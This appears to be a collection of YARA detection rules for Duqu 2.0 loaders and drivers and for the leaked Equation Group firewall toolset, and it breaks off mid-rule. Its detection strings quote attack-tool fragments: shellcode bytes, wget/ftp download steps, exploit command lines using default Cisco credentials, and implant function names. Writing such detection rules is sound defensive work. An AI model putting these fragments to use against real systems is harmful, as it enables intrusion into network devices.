"https://goo.gl/AW9Cuu" date = "2016-06-10" hash1 = "6f0b05d5e8546ab1504b07b0eaa0e8de14bca7c1555fd114c4c1c51d5a4c06b" hash2 = "feaad03f6c0b57f5f5b02aef668e26001e5a7787bb51966d50c8fcf344fb4e8" hash3 = "41ecd81bc7df4b47d713e812f2b7b38d3ac4b9dcdc13dd5ca61763a4bf300dcf" hash4 = "bd780f4d56214c78045454d31d83ae18ed209cc138e75d138e72976a7ef9803f" hash5 = "a25715108d2859595959879ff50085bc85969e9473ecc3d26dda24c4a17822c9" hash6 = "e0918072d427d12b43f436bf0797a361996ae436047d4ef8277f11caf2dd481b" strings: $s1 = "sshkeypairgen.exe" fullword wide $s2 = "OpenSSL: FATAL" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 9000KB and all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule apt_duqu2_loaders { meta: copyright = "Kaspersky Lab" description = "Rule to detect Duqu 2.0 samples" last_modified = "2015-06-09" version = "1.0" strings: $a1 = "{AAFFC4F0-E04B-4C7C-B40A-B45DE971E81E}" wide $a2 = "\\\\.\\pipe\\{AAFFC4F0-E04B-4C7C-B40A-B45DE971E81E}" wide $a4 = "\\\\.\\pipe\\{AB6172ED-8105-4996-9D2A-597B5F827501}" wide $a5 = "Global\\{B54E3268-DE1E-4c1e-A667-2596751403AD}" wide $a8 = "SELECT `Data` FROM `Binary` WHERE `Name`='%s%i'" wide $a9 = "SELECT `Data` FROM `Binary` WHERE `Name`='CryptHash%i'" wide $a7 = "SELECT `%s` FROM `%s` WHERE `%s`='CAData%i'" wide $b1 = "MSI.dll" $b2 = "msi.dll" $b3 = "StartAction" $c1 = "msisvc_32@" wide $c2 = "PROP=" wide $c3 = "-Embedding" wide $c4 = "S:(ML;;NW;;;LW)" wide $d1 = "NameTypeBinaryDataCustomActionActionSourceTargetInstallExecuteSequenceConditionSequencePropertyValueMicrosoftManufacturer" nocase $d2 = {2E 3F 41 56 3F 24 5F 42 69 6E 64 40 24 30 30 58 55 3F 24 5F 50 6D 66 5F 77 72 61 70 40 50 38 43 4C 52 ?? 40 40 41 45 58 58 5A 58 56 31 40 24 24 24 56 40 73 74 64 40 40 51 41 56 43 4C 52 ?? 40 40 40 73 74 64 40 40} condition: ( (uint16(0) == 0x5a4d) and ( (any of ($a*)) or (all of ($b*)) or (all of ($c*)) ) and filesize < 100000 ) or ( (uint32(0) == 0xe011cfd0) and ( (any of ($a*)) or (all of ($b*)) or (all of ($c*)) or (any of ($d*)) ) and filesize < 20000000 ) } rule apt_duqu2_drivers { meta: copyright = "Kaspersky Lab" description = "Rule to detect Duqu 2.0 drivers" last_modified = "2015-06-09" version = "1.0" strings: $a1 = "\\DosDevices\\port_optimizer" wide nocase $a2 = "romanian.antihacker" $a3 = "PortOptimizerTermSrv" wide $a4 = "ugly.gorilla1" $b1 = "NdisIMCopySendCompletePerPacketInfo" $b2 = "NdisReEnumerateProtocolBindings" $b3 = "NdisOpenProtocolConfiguration" condition: uint16(0) == 0x5A4D and (any of ($a*) ) and (2 of ($b*)) and filesize < 100000 } /* Action Loader Samples --------------------------------------------------- */ rule Duqu2_Generic1 { meta: description = "Kaspersky APT Report - Duqu2 Sample - Generic Rule" author = "Florian Roth" reference = "https://goo.gl/7yKyOj" date = "2015-06-10" super_rule = 1 hash0 = "3f9168facb13429105a749d35569d1e91465d313" hash1 = "0a574234615fb2382d85cd6d1a250d6c437afecc" hash2 = "38447ed1d5e3454fe17699f86c0039f30cc64cde" hash3 = "5282d073ee1b3f6ce32222ccc2f6066e2ca9c172" hash4 = "edfca3f0196788f7fde22bd92a8817a957c10c52" hash5 = "6a4ffa6ca4d6fde8a30b6c8739785f4bd2b5c415" hash6 = "00170bf9983e70e8dd4f7afe3a92ce1d12664467" hash7 = "32f8689fd18c723339414618817edec6239b18f3" hash8 = "f860acec9920bc009a1ad5991f3d5871c2613672" hash9 = "413ba509e41c526373f991d1244bc7c7637d3e13" hash10 = "29cd99a9b6d11a09615b3f9ef63f1f3cffe7ead8" hash11 = "dfe1cb775719b529138e054e7246717304db00b1" strings: $s0 = "Global\\{B54E3268-DE1E-4c1e-A667-2596751403AD}" fullword wide $s1 = "SetSecurityDescriptorSacl" fullword ascii /* PEStudio Blacklist: strings */ /* Goodware String - occured 189 times */ $s2 = "msisvc_32@" fullword wide $s3 = "CompareStringA" fullword ascii /* PEStudio Blacklist: strings */ /* Goodware String - occured 1392 times */ $s4 = "GetCommandLineW" fullword ascii /* PEStudio Blacklist: strings */ /* Goodware String - occured 1680 times */ condition: uint16(0) == 0x5a4d and filesize < 150KB and all of them } rule APT_Kaspersky_Duqu2_procexp { meta: description = "Kaspersky APT Report - Duqu2 Sample - Malicious MSI" author = "Florian Roth" reference = "https://goo.gl/7yKyOj" date = "2015-06-10" hash1 = "2422835716066b6bcecb045ddd4f1fbc9486667a" hash2 = "b120620b5d82b05fee2c2153ceaf305807fa9f79" hash3 = "288ebfe21a71f83b5575dfcc92242579fb13910d" strings: $x1 = "svcmsi_32.dll" fullword wide $x2 = "msi3_32.dll" fullword wide $x3 = "msi4_32.dll" fullword wide $x4 = "MSI.dll" fullword ascii $s1 = "SELECT `Data` FROM `Binary` WHERE `Name`='%s%i'" fullword wide $s2 = "Sysinternals installer" fullword wide /* PEStudio Blacklist: strings */ $s3 = "Process Explorer" fullword wide /* PEStudio Blacklist: strings */ /* Goodware String - occured 5 times */ condition: uint16(0) == 0x5a4d and filesize < 100KB and ( 1 of ($x*) ) and ( all of ($s*) ) } rule APT_Kaspersky_Duqu2_SamsungPrint { meta: description = "Kaspersky APT Report - Duqu2 Sample - file 2a9a5afc342cde12c6eb9a91ad29f7afdfd8f0fb17b983dcfddceccfbc17af69" author = "Florian Roth" reference = "https://goo.gl/7yKyOj" date = "2015-06-10" hash = "ce39f41eb4506805efca7993d3b0b506ab6776ca" strings: $s0 = "Installer for printer drivers and applications" fullword wide /* PEStudio Blacklist: strings */ $s1 = "msi4_32.dll" fullword wide $s2 = "HASHVAL" fullword wide $s3 = "SELECT `%s` FROM `%s` WHERE `%s`='CAData%i'" fullword wide $s4 = "ca.dll" fullword ascii $s5 = "Samsung Electronics Co., Ltd." fullword wide condition: uint16(0) == 0x5a4d and filesize < 82KB and all of them } rule APT_Kaspersky_Duqu2_msi3_32 { meta: description = "Kaspersky APT Report - Duqu2 Sample - file d8a849654ab97debaf28ae5b749c3b1ff1812ea49978713853333db48c3972c3" author = "Florian Roth" reference = "https://goo.gl/7yKyOj" date = "2015-06-10" hash = "53d9ef9e0267f10cc10f78331a9e491b3211046b" strings: $s0 = "ProcessUserAccounts" fullword ascii /* PEStudio Blacklist: strings */ $s1 = "SELECT `UserName`, `Password`, `Attributes` FROM `CustomUserAccounts`" fullword wide /* PEStudio Blacklist: strings */ $s2 = "SELECT `UserName` FROM `CustomUserAccounts`" fullword wide /* PEStudio Blacklist: strings */ $s3 = "SELECT `Data` FROM `Binary` WHERE `Name`='CryptHash%i'" fullword wide $s4 = "msi3_32.dll" fullword wide $s5 = "RunDLL" fullword ascii $s6 = "MSI Custom Action v3" fullword wide $s7 = "msi3_32" fullword wide $s8 = "Operating System" fullword wide /* PEStudio Blacklist: strings */ /* Goodware String - occured 9203 times */ condition: uint16(0) == 0x5a4d and filesize < 72KB and all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ /* Yara Rule Set Author: Florian Roth Date: 2016-08-15 Identifier: EQGRP */ /* Rule Set ----------------------------------------------------------------- */ rule EQGRP_noclient_3_0_5 { meta: description = "Detects tool from EQGRP toolset - file noclient-3.0.5.3" author = "Florian Roth" reference = "Research" date = "2016-08-15" strings: $x1 = "-C %s 127.0.0.1\" scripme -F -t JACKPOPIN4 '&" fullword ascii $x2 = "Command too long! What the HELL are you trying to do to me?!?! Try one smaller than %d bozo." fullword ascii $x3 = "sh -c \"ping -c 2 %s; grep %s /proc/net/arp >/tmp/gx \"" fullword ascii $x4 = "Error from ourtn, did not find keys=target in tn.spayed" fullword ascii $x5 = "ourtn -d -D %s -W 127.0.0.1:%d -i %s -p %d %s %s" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 700KB and 1 of them ) or ( all of them ) } rule EQGRP_installdate { meta: description = "Detects tool from EQGRP toolset - file installdate.pl" author = "Florian Roth" reference = "Research" date = "2016-08-15" strings: $x1 = "#Provide hex or EP log as command-line argument or as input" fullword ascii $x2 = "print \"Gimme hex: \";" fullword ascii $x3 = "if ($line =~ /Reg_Dword: (\\d\\d:\\d\\d:\\d\\d.\\d+ \\d+ - )?(\\S*)/) {" fullword ascii $s1 = "if ($_ =~ /InstallDate/) {" fullword ascii $s2 = "if (not($cmdInput)) {" fullword ascii $s3 = "print \"$hex in decimal=$dec\\n\\n\";" fullword ascii condition: filesize < 2KB and ( 1 of ($x*) or 3 of them ) } rule EQGRP_teflondoor { meta: description = "Detects tool from EQGRP toolset - file teflondoor.exe" author = "Florian Roth" reference = "Research" date = "2016-08-15" strings: $x1 = "%s: abort. Code is %d. Message is '%s'" fullword ascii $x2 = "%s: %li b (%li%%)" fullword ascii $s1 = "no winsock" fullword ascii $s2 = "%s: %s file '%s'" fullword ascii $s3 = "peer: connect" fullword ascii $s4 = "read: write" fullword ascii $s5 = "%s: done!" fullword ascii $s6 = "%s: %li b" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 30KB and 1 of ($x*) and 3 of them } rule EQGRP_durablenapkin_solaris_2_0_1 { meta: description = "Detects tool from EQGRP toolset - file durablenapkin.solaris.2.0.1.1" author = "Florian Roth" reference = "Research" date = "2016-08-15" strings: $s1 = "recv_ack: %s: Service not supplied by provider" fullword ascii $s2 = "send_request: putmsg \"%s\": %s" fullword ascii $s3 = "port undefined" fullword ascii $s4 = "recv_ack: %s getmsg: %s" fullword ascii $s5 = ">> %d -- %d" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 40KB and 2 of them ) } rule EQGRP_teflonhandle { meta: description = "Detects tool from EQGRP toolset - file teflonhandle.exe" author = "Florian Roth" reference = "Research" date = "2016-08-15" strings: $s1 = "%s [infile] [outfile] /k 0x[%i character hex key] </g>" fullword ascii $s2 = "File %s already exists. Overwrite? (y/n) " fullword ascii $s3 = "Random Key : 0x" fullword ascii $s4 = "done (%i bytes written)." fullword ascii $s5 = "%s --> %s..." fullword ascii condition: uint16(0) == 0x5a4d and filesize < 20KB and 2 of them } rule EQGRP_false { meta: description = "Detects tool from EQGRP toolset - file false.exe" author = "Florian Roth" reference = "Research" date = "2016-08-15" strings: $s1 = { 00 25 64 2E 0A 00 00 00 00 25 64 2E 0A 00 00 00 00 25 6C 75 2E 25 6C 75 2E 25 6C 75 2E 25 6C 75 00 25 64 2E 0A 00 00 00 00 25 64 2E 0A 00 00 00 00 25 64 2E 0A 00 00 00 00 25 64 2E 0A 00 00 00 00 25 32 2E 32 58 20 00 00 0A 00 00 00 25 64 20 2D 20 25 64 20 25 64 0A 00 25 64 0A 00 25 64 2E 0A 00 00 00 00 25 64 2E 0A 00 00 00 00 25 64 2E 0A 00 00 00 00 25 64 20 2D 20 25 64 0A 00 00 00 00 25 64 20 2D 20 25 64 } condition: uint16(0) == 0x5a4d and filesize < 50KB and $s1 } rule EQGRP_bc_genpkt { meta: description = "Detects tool from EQGRP toolset - file bc-genpkt" author = "Florian Roth" reference = "Research" date = "2016-08-15" strings: $x1 = "load auxiliary object=%s requested by file=%s" fullword ascii $x2 = "size of new packet, should be %d <= size <= %d bytes" fullword ascii $x3 = "verbosity - show lengths, packet dumps, etc" fullword ascii $s1 = "%s: error while loading shared libraries: %s%s%s%s%s" fullword ascii $s2 = "cannot dynamically load executable" fullword ascii $s3 = "binding file %s to %s: %s symbol `%s' [%s]" fullword ascii $s4 = "randomize the initiator cookie" fullword ascii condition: uint16(0) == 0x457f and filesize < 1000KB and ( 1 of ($s*) and 3 of them ) } rule EQGRP_dn_1_0_2_1 { meta: description = "Detects tool from EQGRP toolset - file dn.1.0.2.1.linux" author = "Florian Roth" reference = "Research" date = "2016-08-15" strings: $s1 = "Valid commands are: SMAC, DMAC, INT, PACK, DONE, GO" fullword ascii $s2 = "invalid format suggest DMAC=00:00:00:00:00:00" fullword ascii $s3 = "SMAC=%02x:%02x:%02x:%02x:%02x:%02x" fullword ascii $s4 = "Not everything is set yet" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 30KB and 2 of them ) } rule EQGRP_morel { meta: description = "Detects tool from EQGRP toolset - file morel.exe" author = "Florian Roth" reference = "Research" date = "2016-08-15" hash1 = "a9152e67f507c9a179bb8478b58e5c71c444a5a39ae3082e04820a0613cd6d9f" strings: $s1 = "%d - %d, %d" fullword ascii $s2 = "%d - %lu.%lu %d.%lu" fullword ascii $s3 = "%d - %d %d" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 60KB and all of them ) } rule EQGRP_bc_parser { meta: description = "Detects tool from EQGRP toolset - file bc-parser" author = "Florian Roth" reference = "Research" date = "2016-08-15" hash1 = "879f2f1ae5d18a3a5310aeeafec22484607649644e5ecb7d8a72f0877ac19cee" strings: $s1 = "*** Target may be susceptible to FALSEMOREL ***" fullword ascii $s2 = "*** Target is susceptible to FALSEMOREL ***" fullword ascii condition: uint16(0) == 0x457f and 1 of them } rule EQGRP_1212 { meta: description = "Detects tool from EQGRP toolset - file 1212.pl" author = "Florian Roth" reference = "Research" date = "2016-08-15" strings: $s1 = "if (!(($srcip,$dstip,$srcport,$dstport) = ($line=~/^([a-f0-9]{8})([a-f0-9]{8})([a-f0-9]{4})([a-f0-9]{4})$/)))" fullword ascii $s2 = "$ans=\"$srcip:$srcport -> $dstip:$dstport\";" fullword ascii $s3 = "return \"ERROR:$line is not a valid port\";" fullword ascii $s4 = "$dstport=hextoPort($dstport);" fullword ascii $s5 = "sub hextoPort" fullword ascii $s6 = "$byte_table{\"$chars[$sixteens]$chars[$ones]\"}=$i;" fullword ascii condition: filesize < 6KB and 4 of them } rule EQGRP_1212_dehex { meta: description = "Detects tool from EQGRP toolset - from files 1212.pl, dehex.pl" author = "Florian Roth" reference = "Research" date = "2016-08-15" strings: $s1 = "return \"ERROR:$line is not a valid address\";" fullword ascii $s2 = "print \"ERROR: the filename or hex representation needs to be one argument try using \\\"'s\\n\";" fullword ascii $s3 = "push(@octets,$byte_table{$tempi});" fullword ascii $s4 = "$byte_table{\"$chars[$sixteens]$chars[$ones]\"}=$i;" fullword ascii $s5 = "print hextoIP($ARGV[0]);" fullword ascii condition: ( uint16(0) == 0x2123 and filesize < 6KB and ( 5 of ($s*) ) ) or ( all of them ) } /* Yara Rule Set Author: Florian Roth Date: 2016-08-16 Identifier: EQGRP */ /* Rule Set ----------------------------------------------------------------- */ rule install_get_persistent_filenames { meta: description = "EQGRP Toolset Firewall - file install_get_persistent_filenames" author = "Florian Roth" reference = "Research" date = "2016-08-16" hash1 = "4a50ec4bf42087e932e9e67e0ea4c09e52a475d351981bb4c9851fda02b35291" strings: $s1 = "Generates the persistence file name and prints it out." fullword ascii condition: ( uint16(0) == 0x457f and all of them ) } rule EQGRP_create_dns_injection { meta: description = "EQGRP Toolset Firewall - file create_dns_injection.py" author = "Florian Roth" reference = "Research" date = "2016-08-16" hash1 = "488f3cc21db0688d09e13eb85a197a1d37902612c3e302132c84e07bc42b1c32" strings: $s1 = "Name: A hostname: 'host.network.com', a decimal numeric offset within" fullword ascii $s2 = "-a www.badguy.net,CNAME,1800,host.badguy.net \\\\" fullword ascii condition: 1 of them } rule EQGRP_screamingplow { meta: description = "EQGRP Toolset Firewall - file screamingplow.sh" author = "Florian Roth" reference = "Research" date = "2016-08-16" hash1 = "c7f4104c4607a03a1d27c832e1ebfc6ab252a27a1709015b5f1617b534f0090a" strings: $s1 = "What is the name of your PBD:" fullword ascii $s2 = "You are now ready for a ScreamPlow" fullword ascii condition: 1 of them } rule EQGRP_MixText { meta: description = "EQGRP Toolset Firewall - file MixText.py" author = "Florian Roth" reference = "Research" date = "2016-08-16" hash1 = "e4d24e30e6cc3a0aa0032dbbd2b68c60bac216bef524eaf56296430aa05b3795" strings: $s1 = "BinStore enabled implants." fullword ascii condition: 1 of them } rule EQGRP_tunnel_state_reader { meta: description = "EQGRP Toolset Firewall - file tunnel_state_reader" author = "Florian Roth" reference = "Research" date = "2016-08-16" hash1 = "49d48ca1ec741f462fde80da68b64dfa5090855647520d29e345ef563113616c" strings: $s1 = "Active connections will be maintained for this tunnel. Timeout:" fullword ascii $s5 = "%s: compatible with BLATSTING version 1.2" fullword ascii condition: 1 of them } rule EQGRP_payload { meta: description = "EQGRP Toolset Firewall - file payload.py" author = "Florian Roth" reference = "Research" date = "2016-08-16" hash1 = "21bed6d699b1fbde74cbcec93575c9694d5bea832cd191f59eb3e4140e5c5e07" strings: $s1 = "can't find target version module!" fullword ascii $s2 = "class Payload:" fullword ascii condition: all of them } rule EQGRP_eligiblecandidate { meta: description = "EQGRP Toolset Firewall - file eligiblecandidate.py" author = "Florian Roth" reference = "Research" date = "2016-08-16" hash1 = "c4567c00734dedf1c875ecbbd56c1561a1610bedb4621d9c8899acec57353d86" strings: $o1 = "Connection timed out. Only a problem if the callback was not received." fullword ascii $o2 = "Could not reliably detect cookie. Using 'session_id'..." fullword ascii $c1 = "def build_exploit_payload(self,cmd=\"/tmp/httpd\"):" fullword ascii $c2 = "self.build_exploit_payload(cmd)" fullword ascii condition: 1 of them } rule EQGRP_BUSURPER_2211_724 { meta: description = "EQGRP Toolset Firewall - file BUSURPER-2211-724.exe" author = "Florian Roth" reference = "Research" date = "2016-08-16" hash1 = "d809d6ff23a9eee53d2132d2c13a9ac5d0cb3037c60e229373fc59a4f14bc744" strings: $s1 = ".got_loader" fullword ascii $s2 = "_start_text" fullword ascii $s3 = "IMPLANT" fullword ascii $s4 = "KEEPGOING" fullword ascii $s5 = "upgrade_implant" fullword ascii condition: all of them } rule EQGRP_networkProfiler_orderScans { meta: description = "EQGRP Toolset Firewall - file networkProfiler_orderScans.sh" author = "Florian Roth" reference = "Research" date = "2016-08-16" hash1 = "ea986ddee09352f342ac160e805312e3a901e58d2beddf79cd421443ba8c9898" strings: $x1 = "Unable to save off predefinedScans directory" fullword ascii $x2 = "Re-orders the networkProfiler scans so they show up in order in the LP" fullword ascii condition: 1 of them } rule EQGRP_epicbanana_2_1_0_1 { meta: description = "EQGRP Toolset Firewall - file epicbanana_2.1.0.1.py" author = "Florian Roth" reference = "Research" date = "2016-08-16" hash1 = "4b13cc183c3aaa8af43ef3721e254b54296c8089a0cd545ee3b867419bb66f61" strings: $s1 = "failed to create version-specific payload" fullword ascii $s2 = "(are you sure you did \"make [version]\" in versions?)" fullword ascii condition: 1 of them } rule EQGRP_sniffer_xml2pcap { meta: description = "EQGRP Toolset Firewall - file sniffer_xml2pcap" author = "Florian Roth" reference = "Research" date = "2016-08-16" hash1 = "f5e5d75cfcd86e5c94b0e6f21bbac886c7e540698b1556d88a83cc58165b8e42" strings: $x1 = "-s/--srcip <sourceIP> Use given source IP (if sniffer doesn't collect source IP)" fullword ascii $x2 = "convert an XML file generated by the BLATSTING sniffer module into a pcap capture file." fullword ascii condition: 1 of them } rule EQGRP_BananaAid { meta: description = "EQGRP Toolset Firewall - file BananaAid" author = "Florian Roth" reference = "Research" date = "2016-08-16" hash1 = "7a4fb825e63dc612de81bc83313acf5eccaa7285afc05941ac1fef199279519f" strings: $x1 = "(might have to delete key in ~/.ssh/known_hosts on linux box)" fullword ascii $x2 = "scp BGLEE-" ascii $x3 = "should be 4bfe94b1 for clean bootloader version 3.0; " fullword ascii $x4 = "scp <configured implant> <username>@<IPaddr>:onfig" fullword ascii condition: 1 of them } rule EQGRP_bo { meta: description = "EQGRP Toolset Firewall - file bo" author = "Florian Roth" reference = "Research" date = "2016-08-16" hash1 = "aa8b363073e8ae754b1836c30f440d7619890ded92fb5b97c73294b15d22441d" strings: $s1 = "ERROR: failed to open %s: %d" fullword ascii $s2 = "__libc_start_main@@GLIBC_2.0" fullword ascii $s3 = "serial number: %s" fullword ascii $s4 = "strerror@@GLIBC_2.0" fullword ascii $s5 = "ERROR: mmap failed: %d" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 20KB and all of them ) } rule EQGRP_SecondDate_2211 { meta: description = "EQGRP Toolset Firewall - file SecondDate-2211.exe" author = "Florian Roth" reference = "Research" date = "2016-08-16" hash1 = "2337d0c81474d03a02c404cada699cf1b86c3c248ea808d4045b86305daa2607" strings: $s1 = "SD_processControlPacket" fullword ascii $s2 = "Encryption_rc4SetKey" fullword ascii $s3 = ".got_loader" fullword ascii $s4 = "^GET.*(?:/ |\\.(?:htm|asp|php)).*\\r\\n" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 200KB and all of them ) } rule EQGRP_config_jp1_UA { meta: description = "EQGRP Toolset Firewall - file config_jp1_UA.pl" author = "Florian Roth" reference = "Research" date = "2016-08-16" hash1 = "2f50b6e9891e4d7fd24cc467e7f5cfe348f56f6248929fec4bbee42a5001ae56" strings: $x1 = "This program will configure a JETPLOW Userarea file." fullword ascii $x2 = "Error running config_implant." fullword ascii $x3 = "NOTE: IT ASSUMES YOU ARE OPERATING IN THE INSTALL/LP/JP DIRECTORY. THIS ASSUMPTION " fullword ascii $x4 = "First IP address for beacon destination [127.0.0.1]" fullword ascii condition: 1 of them } rule EQGRP_userscript { meta: description = "EQGRP Toolset Firewall - file userscript.FW" author = "Florian Roth" reference = "Research" date = "2016-08-16" hash1 = "5098ff110d1af56115e2c32f332ff6e3973fb7ceccbd317637c9a72a3baa43d7" strings: $x1 = "Are you sure? Don't forget that NETSCREEN firewalls require BANANALIAR!! " fullword ascii condition: 1 of them } rule EQGRP_BBALL_M50FW08_2201 { meta: description = "EQGRP Toolset Firewall - file BBALL_M50FW08-2201.exe" author = "Florian Roth" reference = "Research" date = "2016-08-16" hash1 = "80c0b68adb12bf3c15eff9db70a57ab999aad015da99c4417fdfd28156d8d3f7" strings: $s1 = ".got_loader" fullword ascii $s2 = "LOADED" fullword ascii $s3 = "pageTable.c" fullword ascii $s4 = "_start_text" fullword ascii $s5 = "handler_readBIOS" fullword ascii $s6 = "KEEPGOING" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 40KB and 5 of ($s*) ) } rule EQGRP_BUSURPER_3001_724 { meta: description = "EQGRP Toolset Firewall - file BUSURPER-3001-724.exe" author = "Florian Roth" reference = "Research" date = "2016-08-16" hash1 = "6b558a6b8bf3735a869365256f9f2ad2ed75ccaa0eefdc61d6274df4705e978b" strings: $s1 = "IMPLANT" fullword ascii $s2 = "KEEPGOING" fullword ascii $s3 = "upgrade_implant" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 200KB and 2 of them ) or ( all of them ) } rule EQGRP_workit { meta: description = "EQGRP Toolset Firewall - file workit.py" author = "Florian Roth" reference = "Research" date = "2016-08-16" hash1 = "fb533b4d255b4e6072a4fa2e1794e38a165f9aa66033340c2f4f8fd1da155fac" strings: $s1 = "macdef init > /tmp/.netrc;" fullword ascii $s2 = "/usr/bin/wget http://" fullword ascii $s3 = "HOME=/tmp ftp" fullword ascii $s4 = " >> /tmp/.netrc;" fullword ascii $s5 = "/usr/rapidstream/bin/tftp" fullword ascii $s6 = "created shell_command:" fullword ascii $s7 = "rm -f /tmp/.netrc;" fullword ascii $s8 = "echo quit >> /tmp/.netrc;" fullword ascii $s9 = "echo binary >> /tmp/.netrc;" fullword ascii $s10 = "chmod 600 /tmp/.netrc;" fullword ascii $s11 = "created cli_command:" fullword ascii condition: 6 of them } rule EQGRP_tinyhttp_setup { meta: description = "EQGRP Toolset Firewall - file tinyhttp_setup.sh" author = "Florian Roth" reference = "Research" date = "2016-08-16" hash1 = "3d12c83067a9f40f2f5558d3cf3434bbc9a4c3bb9d66d0e3c0b09b9841c766a0" strings: $x1 = "firefox http://127.0.0.1:8000/$_name" fullword ascii $x2 = "What is the name of your implant:" fullword ascii /* it's called conscience */ $x3 = "killall thttpd" fullword ascii $x4 = "copy http://<IP>:80/$_name flash:/$_name" fullword ascii condition: ( uint16(0) == 0x2123 and filesize < 2KB and 1 of ($x*) ) or ( all of them ) } rule EQGRP_shellcode { meta: description = "EQGRP Toolset Firewall - file shellcode.py" author = "Florian Roth" reference = "Research" date = "2016-08-16" hash1 = "ac9decb971dd44127a6ca0d35ac153951f0735bb4df422733046098eca8f8b7f" strings: $s1 = "execute_post = '\\xe8\\x00\\x00\\x00\\x00\\x5d\\xbe\\xef\\xbe\\xad\\xde\\x89\\xf7\\x89\\xec\\x29\\xf4\\xb8\\x03\\x00\\x00\\x00" ascii $s2 = "tiny_exec = '\\x7f\\x45\\x4c\\x46\\x01\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x03\\x00\\x01\\x00\\x00" ascii $s3 = "auth_id = '\\x31\\xc0\\xb0\\x03\\x31\\xdb\\x89\\xe1\\x31\\xd2\\xb6\\xf0\\xb2\\x0d\\xcd\\x80\\x3d\\xff\\xff\\xff\\xff\\x75\\x07" ascii $c1 = { e8 00 00 00 00 5d be ef be ad de 89 f7 89 ec 29 f4 b8 03 00 00 00 } /* $c2 = { 7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00 02 00 03 00 01 00 00 } too many fps */ $c3 = { 31 c0 b0 03 31 db 89 e1 31 d2 b6 f0 b2 0d cd 80 3d ff ff ff ff 75 07 } condition: 1 of them } rule EQGRP_EPBA { meta: description = "EQGRP Toolset Firewall - file EPBA.script" author = "Florian Roth" reference = "Research" date = "2016-08-16" hash1 = "53e1af1b410ace0934c152b5df717d8a5a8f5fdd8b9eb329a44d94c39b066ff7" strings: $x1 = "./epicbanana_2.0.0.1.py -t 127.0.0.1 --proto=ssh --username=cisco --password=cisco --target_vers=asa804 --mem=NA -p 22 " fullword ascii $x2 = "-t TARGET_IP, --target_ip=TARGET_IP -- Either 127.0.0.1 or Win Ops IP" fullword ascii $x3 = "./bride-1100 --lp 127.0.0.1 --implant 127.0.0.1 --sport RHP --dport RHP" fullword ascii $x4 = "--target_vers=TARGET_VERS target Pix version (pix712, asa804) (REQUIRED)" fullword ascii $x5 = "-p DEST_PORT, --dest_port=DEST_PORT defaults: telnet=23, ssh=22 (optional) - Change to LOCAL redirect port" fullword ascii $x6 = "this operation is complete, BananaGlee will" fullword ascii $x7 = "cd /current/bin/FW/BGXXXX/Install/LP" fullword ascii condition: ( uint16(0) == 0x2023 and filesize < 7KB and 1 of ($x*) ) or ( 3 of them ) } rule EQGRP_BPIE { meta: description = "EQGRP Toolset Firewall - file BPIE-2201.exe" author = "Florian Roth" reference = "Research" date = "2016-08-16" hash1 = "697e80cf2595c85f7c931693946d295994c55da17a400f2c9674014f130b4688" strings: $s1 = "profProcessPacket" fullword ascii $s2 = ".got_loader" fullword ascii $s3 = "getTimeSlotCmdHandler" fullword ascii $s4 = "getIpIpCmdHandler" fullword ascii $s5 = "LOADED" fullword ascii $s6 = "profStartScan" fullword ascii $s7 = "tmpData.1" fullword ascii $s8 = "resetCmdHandler" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 70KB and 6 of ($s*) ) } rule EQGRP_jetplow_SH { meta: description = "EQGRP Toolset Firewall - file jetplow.sh" author = "Florian Roth" reference = "Research" date = "2016-08-16" hash1 = "ee266f84a1a4ccf2e789a73b0a11242223ed6eba6868875b5922aea931a2199c" strings: $s1 = "cd /current/bin/FW/BANANAGLEE/$bgver/Install/LP/jetplow" fullword ascii $s2 = "***** Please place your UA in /current/bin/FW/OPS *****" fullword ascii $s3 = "ln -s ../jp/orig_code.bin orig_code_pixGen.bin" fullword ascii $s4 = "***** Welcome to JetPlow *****" fullword ascii condition: 1 of them } rule EQGRP_BBANJO { meta: description = "EQGRP Toolset Firewall - file BBANJO-3011.exe" author = "Florian Roth" reference = "Research" date = "2016-08-16" hash1 = "f09c2f90464781a08436321f6549d350ecef3d92b4f25b95518760f5d4c9b2c3" strings: $s1 = "get_lsl_interfaces" fullword ascii $s2 = "encryptFC4Payload" fullword ascii $s3 = ".got_loader" fullword ascii $s4 = "beacon_getconfig" fullword ascii $s5 = "LOADED" fullword ascii $s6 = "FormBeaconPacket" fullword ascii $s7 = "beacon_reconfigure" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 50KB and all of them ) } rule EQGRP_BPATROL_2201 { meta: description = "EQGRP Toolset Firewall - file BPATROL-2201.exe" author = "Florian Roth" reference = "Research" date = "2016-08-16" hash1 = "aa892750b893033eed2fedb2f4d872f79421174eb217f0c34a933c424ae66395" strings: $s1 = "dumpConfig" fullword ascii $s2 = "getstatusHandler" fullword ascii $s3 = ".got_loader" fullword ascii $s4 = "xtractdata" fullword ascii $s5 = "KEEPGOING" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 40KB and all of them ) } rule EQGRP_extrabacon { meta: description = "EQGRP Toolset Firewall - file extrabacon_1.1.0.1.py" author = "Florian Roth" reference = "Research" date = "2016-08-16" hash1 = "59d60835fe200515ece36a6e87e642ee8059a40cb04ba5f4b9cce7374a3e7735" strings: $x1 = "To disable password checking on target:" fullword ascii $x2 = "[-] target is running" fullword ascii $x3 = "[-] problem importing version-specific shellcode from" fullword ascii $x4 = "[+] importing version-specific shellcode" fullword ascii $s5 = "[-] unsupported target version, abort" fullword ascii condition: 1 of them } rule EQGRP_sploit_py { meta: description = "EQGRP Toolset Firewall - file sploit.py" author = "Florian Roth" reference = "Research" date = "2016-08-16" hash1 = "0316d70a5bbf068a7fc791e08e816015d04ec98f088a7ff42af8b9e769b8d1f6" strings: 